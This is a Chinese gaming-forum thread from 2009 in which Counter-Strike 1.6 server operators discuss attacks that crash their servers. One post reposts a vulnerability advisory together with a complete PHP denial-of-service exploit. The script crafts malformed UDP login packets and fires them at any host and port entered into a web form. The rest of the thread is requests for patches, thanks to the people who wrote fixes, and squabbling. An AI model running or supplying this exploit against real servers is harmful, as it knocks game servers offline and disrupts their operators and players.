搜索
楼主: ypf

关于此次CS漏洞攻击的讨论整合贴[都来这说]

[复制链接]
发表于 2009-2-3 19:12:32 | 显示全部楼层 来自 中国–广西–南宁
A版大大!什么时候能出linux3651的补丁啊!服务器没法开了!一开就被攻击,不知道是谁家的小孩那么没教养,等待A版大大出linux3651补丁!
回复

使用道具 举报

发表于 2009-2-3 20:19:44 | 显示全部楼层 来自 中国–广东–深圳–宝安区
Half-Life Counter-Strike登录拒绝服务漏洞
也就是我们通常说的炸F
漏洞消息时间:2008-01-07

漏洞起因
异常条件处理失败错误

影响系统
Valve Software Half-Life Counter-Strike 1.6

不受影响系统

危害
远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。

攻击所需条件
攻击者必须访问Half-Life Counter-Strike。

漏洞信息
Half-Life Counter-Strike是一款流行的即时射击游戏。
Half-Life Counter-Strike不正确处理登录请求,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。
提交恶意登录请求可触发此漏洞。

测试方法
----[  Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ]

Counter Strike 1.6 Denial Of Service POC
Eugene Minaev underwater@itdefence.ru
Bug was found by Maxim Suhanov ( THE FUF )
works only with no-steam servers
___________________________________________________________________
____/  __ __ _______________________ _______  _______________    \  \    / .\  /  /_// //              /        \       \/      __       \   /__/   /
/ /     /_//              /\        /       /      /         /     /___/
\/        /              / /       /       /\     /         /         /
/        /               \/       /       / /    /         /__       // \       /    ____________/       /        \/    __________// /__    // /   
/\\      \_______/        \________________/____/  2007    /_//_/   // // \ \\                                                               // // /
.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / .
. \_\\________[________________________________________]_________//_//_/ . .

  1. /*
  2. CS-dos exploit made by underwater
  3. Bug was discovered by .FUF  
  4. Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server [IMG]http://www.softoplanet.ru/style_emoticons/default/biggrin.gif[/IMG] ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
  5. */

  6. ini_set("display_errors","0");

  7. function HELLO_PACKET()
  8. {
  9. $packet = pack("H*","FFFFFFFF");
  10. $packet .= "TSource Engine Query";
  11. $packet .= pack("H*","00");
  12. return $packet;
  13. }

  14. function CHALLENGE_PACKET()
  15. {
  16. $packet = pack("H*","FFFFFFFF");
  17. $packet .= "getchallenge valve";
  18. $packet .= pack("H*","00");
  19. return $packet;
  20. }

  21. function LOGIN_PACKET_4()
  22. {
  23. global $cookie;
  24. global $password;
  25. $packet = pack("H*","FFFFFFFF");
  26. $packet .= "connect 47 ";
  27. $packet .= $cookie.' "';
  28. $packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
  29. $packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';
  30. $packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
  31. $packet .= 'word\\'.$password;
  32. $packet .= pack("H*","220A0000EE02");
  33. return $packet;
  34. }

  35. function LOGIN_PACKET_2()
  36. {
  37. global $cookie;
  38. global $password;
  39. $packet = pack("H*","FFFFFFFF");
  40. $packet .= "connect 47 ";
  41. $packet .= $cookie.' "';
  42. $packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
  43. $packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';
  44. $packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';
  45. $packet .= 'word\\'.$password;
  46. $packet .= pack("H*","22");
  47. return $packet;
  48. }

  49. function dowork($host,$port,$password,$auth)
  50. {
  51. global $password;
  52. global $cookie;
  53. # connecting to target host
  54. $fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
  55. if (!$fsock) die ($errstr);
  56. else
  57. {
  58. # sending hello packet
  59. fwrite ($fsock,HELLO_PACKET());
  60. fread ($fsock,100);
  61. # sending chalennge packet
  62. fwrite ($fsock,CHALLENGE_PACKET());
  63. # recieving cookies
  64. $resp = fread($fsock,100);
  65. # grab cookies from packet
  66. $cookie = substr($resp,strpos($resp,"A00000000")+10);
  67. $cookie = substr($cookie,0,strpos($cookie," "));
  68. # sending login packet
  69. if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
  70. $resp = fread($fsock,100);
  71. }
  72. }

  73. IF (isset($_POST['host']) && isset($_POST['port']))
  74. {
  75. IF (empty($_POST['pass'])) $password = "123";
  76. else $password = $_POST['pass'];
  77. $fserver = $_POST['host'];
  78. $fport = $_POST['port'];
  79. if (isset($_POST['auth'])) $fauth = true;else $fauth=false;
  80. # we have to connect 2 times
  81. $result = dowork($fserver,$fport,$password,$fauth);
  82. $result = dowork($fserver,$fport,$password,$fauth);
  83. # parsing result
  84. echo "Exploit Sent";
  85. }
复制代码
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

厂商解决方案
目前没有解决方案提供:
http://www.valvesoftware.com/games.html

漏洞提供者
Maxim Suhanov

漏洞消息链接
http://www.securityfocus.com/bid/27159

漏洞消息标题
Half-Life Counter-Strike Login Denial of Service Vulnerability
回复

使用道具 举报

发表于 2009-2-3 20:46:09 | 显示全部楼层 来自 中国–广东–韶关
52# szxms


你发表这 有意义吗
回复

使用道具 举报

发表于 2009-2-3 21:37:56 | 显示全部楼层 来自 中国–福建–龙岩
请大家发表意见时不要人身攻击。
谢谢合作。:) :)
回复

使用道具 举报

 楼主| 发表于 2009-2-3 22:48:07 | 显示全部楼层 来自 中国–辽宁–铁岭
着东西axot的能防了吧
回复

使用道具 举报

发表于 2009-2-4 04:02:42 | 显示全部楼层 来自 中国–上海–上海–嘉定区
很有意思                       -
回复

使用道具 举报

发表于 2009-2-6 15:34:07 | 显示全部楼层 来自 中国–山东–青岛
看到DT高人“NIMO”的出现,心里真的不是滋味,我就想知道NIMO你长这么大,学到的东西都是你自己看书来的??楼上有位兄弟说的好,有本事拿出来晾晾,不要卖弄你自己“口活”好!
回复

使用道具 举报

发表于 2009-2-6 21:17:47 | 显示全部楼层 来自 中国–吉林–长春
看到DT高人“NIMO”的出现,心里真的不是滋味,我就想知道NIMO你长这么大,学到的东西都是你自己看书来的??楼上有位兄弟说的好,有本事拿出来晾晾,不要卖弄你自己“口活”好! ...
cann 发表于 2009-2-6 15:34


有什么不是滋味的,今天是牛年嘛 ,就让他吹吹牛逼拜拜火好了。
回复

使用道具 举报

发表于 2009-2-10 02:44:35 | 显示全部楼层 来自 中国–福建–厦门
很感谢axot与Grief.QQ。

谢谢。
回复

使用道具 举报

发表于 2009-2-10 18:55:15 | 显示全部楼层 来自 中国–广东–深圳
呵呵,不要争吵了,可以结贴了。至于公布代码,那要看国情,中国,不行,无聊的人N多,公布了,那就是灾难。这次的漏洞,主要体现在两个攻击漏洞,但是入口都一样,就是模拟登录!

第一:对 .. 的处理,就是两个点 ...
[Grief.QQ] 发表于 2009-1-30 21:42



Good.受教了
回复

使用道具 举报

游客
回复
您需要登录后才可以回帖 登录 | 注个册吧

快速回复 返回顶部 返回列表